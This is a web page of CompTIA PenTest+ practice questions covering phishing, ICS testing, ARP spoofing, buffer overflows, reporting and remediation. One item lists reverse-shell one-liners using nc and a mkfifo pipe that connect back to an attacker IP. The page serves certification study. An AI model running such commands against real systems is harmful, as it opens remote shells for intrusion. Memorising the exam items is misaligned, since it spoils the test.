PT0-001: CompTIA PenTest+ Certification Exam | Practice Test / Quiz / MCQs

1. Which of the following is an example of a spear phishing attack?

Targeting an executive with an SMS attackTargeting an organization with a watering hole attackTargeting a specific team with an email attackTargeting random users with a USB key drop

3. An energy company contracted a security firm to perform a penetration test of a power plant, which employs ICS to manage power generation and cooling. Which of the following is a consideration unique to such an environment that must be made by the firm when preparing for the assessment?

Selection of the appropriate set of security testing toolsElectrical certification of hardware used in the testCurrent and load ratings of the ICS componentsPotential operational and safety hazards

4. A penetration tester is in the process of writing a report that outlines the overall level of risk to operations. In which of the following areas of the report should the penetration tester put this?

Main bodyExecutive summaryTechnical summaryAppendices

5. A healthcare organization must abide by local regulations to protect and attest to the protection of personal health information of covered individuals. Which of the following conditions should a penetration tester specifically test for when performing an assessment? (Select TWO).

S/MIME certificate templates defined by the CACleartext exposure of SNMP trap dataHealth information communicated over HTTP - DAR encryption on records serversSoftware bugs resident in the IT ticketing system

6. A penetration tester reviews the scan results of a web application. Which of the following vulnerabilities is MOST critical and should be prioritized for exploitation?

Expired certificateStored XSSFill path disclosureClickjacking

7. During a web application assessment, a penetration tester discovers that arbitrary commands can be executed on the server. Wanting to take this attack one step further, the penetration tester begins to explore ways to gain a reverse shell back to the attacking machine at 192.168.1.5. Which of the following are possible ways to do so?

nc -e /bin/sh 192.168.1.5 44444nc 192.168.1.5 44444nc -nlvp 44444 -e /bin/sh - rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 44444>/tmp/frm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 444444>/tmp/f

8. Consumer-based IoT devices are often less secure than systems built for traditional desktop computers. Which of the following BEST describes the reasoning for this?

Manufacturers developing IoT devices are less concerned with security.IoT systems often lack the hardware power required by more secure solutions.Regulatory authorities often have lower security requirements for IoT systems.It is difficult for administrators to implement the same security standards across the board.

10. A security assessor completed a comprehensive penetration test of a company and its networks and systems. During the assessment, the tester identified a vulnerability in the crypto library used for TLS on the company's intranet-wide payroll web application. However, the vulnerability has not yet been patched by the vendor, although a patch is expected within days. Which of the following strategies would BEST mitigate the risk of impact?

Require payroll users to change the passwords used to authenticate to the application. Following the patching of the vulnerability, implement another required password change.Implement an ACL to restrict access to the application exclusively to the finance department. Reopen the application to company staff after the vulnerability is patched.Implement new training to be aware of the risks in accessing the application. This training can be decommissioned after the vulnerability is patched.Modify the web server crypto configuration to use a stronger cipher-suite for encryption, hashing, and digital signing.

11. A penetration tester executes the following commands: Which of the following is a local host vulnerability that the attacker is exploiting?

Shell escapeWritable serviceInsecure file permissionsApplication whitelisting

13. A penetration tester reports an application is only utilizing basic authentication on an Internet-facing application. Which of the following would be the BEST remediation strategy?

Enable a secure cookie flag.Sanitize invalid user input.Encrypt the communication channel.Enable HTTP Strict Transport Security.

14. Which of the following is the reason why a penetration tester would run the chkconfig --del servicename command at the end of an engagement?

To remove the persistenceTo enable persistenceTo check for persistenceTo report persistence

15. A company requested a penetration tester review the security of an in-house developed Android application. The penetration tester received an APK file to support the assessment. The penetration tester wants to run SAST on the APK file. Which of the following preparatory steps must the penetration tester do FIRST?

Cross-compile the application.Re-sign the APKConvert JAR files to DEXConvert to JAR. - Decompile.

17. A penetration tester has successfully deployed an evil twin and is starting to see some victim traffic. The next step the penetration tester wants to take is to capture all the victim web traffic unencrypted. Which of the following would BEST meet this goal?

Perform an MITM attack.Harvest the user credentials to decrypt traffic.Implement a CA attack by impersonating trusted CAs.Perform an HTTP downgrade attack.

18. A penetration tester is performing ARP spoofing against a switch. Which of the following should the penetration tester spoof to get the MOST information?

MAC address of the clientMAC address of the web serverMAC address of the gatewayMAC address of the domain controller

19. An email sent from the Chief Executive Officer (CEO) to the Chief Financial Officer (CFO) states a wire transfer is needed to pay a new vendor. Neither is aware of the vendor, and the CEO denies ever sending the email. Which of the following types of motivation was used in this attack?

Principle of scarcityPrinciple of authorityPrinciple of fearPrinciple of likeness E. Principle of social proof

20. A penetration tester was able to retrieve the initial VPN user domain credentials by phishing a member of the IT department. Afterward, the penetration tester obtained hashes over the VPN and easily cracked them using a dictionary attack. Which of the following remediation steps should be recommended?

Install a security information event monitoring solutionImplement two-factor authentication for remote access.Increase password complexity requirements.Mandate all employees take security awareness training - Install an intrusion prevention system - Upgrade the cipher suite used for the VPN solution

21. During testing, a critical vulnerability is discovered on a client's core server. Which of the following should be the NEXT action?

Disable the network port of the affected service.Take the target offline so it cannot be exploited by an attacker.Promptly alert the client with details of the finding.Complete all findings, and then submit them to the client.

22. Which of the following CPU registers does the penetration tester need to overwrite in order to exploit a simple buffer overflow?

Stack pointer registerStack base pointerIndex pointer registerDestination index register

23. A penetration tester is performing a black box assessment on a web-based banking application. The tester was only provided with a URL to the login page. Given the below code and output: Which of the following is the tester intending to do?

Horizontally escalate privileges.Scrape the page for hidden fields.Analyze HTTP response code.Search for HTTP headers.

25. A penetration tester observes that several high-numbered ports are listening on a public web server. However, the system owner says the application only uses port 443. Which of the following would be BEST to recommend?

Implement a web application firewall.Filter port 443 to specific IP addresses.Transition the application to another port.Disable unneeded services.

25 Questions

❤ If you liked Fatskills, consider supporting us by checking out The Life Manuals You Never Got.

About | Explore | User Guide | Topics | Subjects | Doubt Solver | Career Aptitude Test | Answers | Free Tools | What Should We Know?
Privacy | Terms |

Without work one finishes nothing. - Ralph Waldo Emerson
© 2026 Fatskills.com

All trademarks, logos and brand names are the property of their respective owners. All company, product and service names used in this website are for identification purposes only. Use of these names, trademarks and brands does not imply endorsement.

25 Questions

❤ If you liked Fatskills, consider supporting us by checking out The Life Manuals You Never Got.

About | Explore | User Guide | Topics | Subjects | Doubt Solver | Career Aptitude Test | Answers | Free Tools | What Should We Know? Privacy | Terms |

Without work one finishes nothing. - Ralph Waldo Emerson© 2026 Fatskills.com

All trademarks, logos and brand names are the property of their respective owners. All company, product and service names used in this website are for identification purposes only. Use of these names, trademarks and brands does not imply endorsement.

About | Explore | User Guide | Topics | Subjects | Doubt Solver | Career Aptitude Test | Answers | Free Tools | What Should We Know?
Privacy | Terms |

Without work one finishes nothing. - Ralph Waldo Emerson
© 2026 Fatskills.com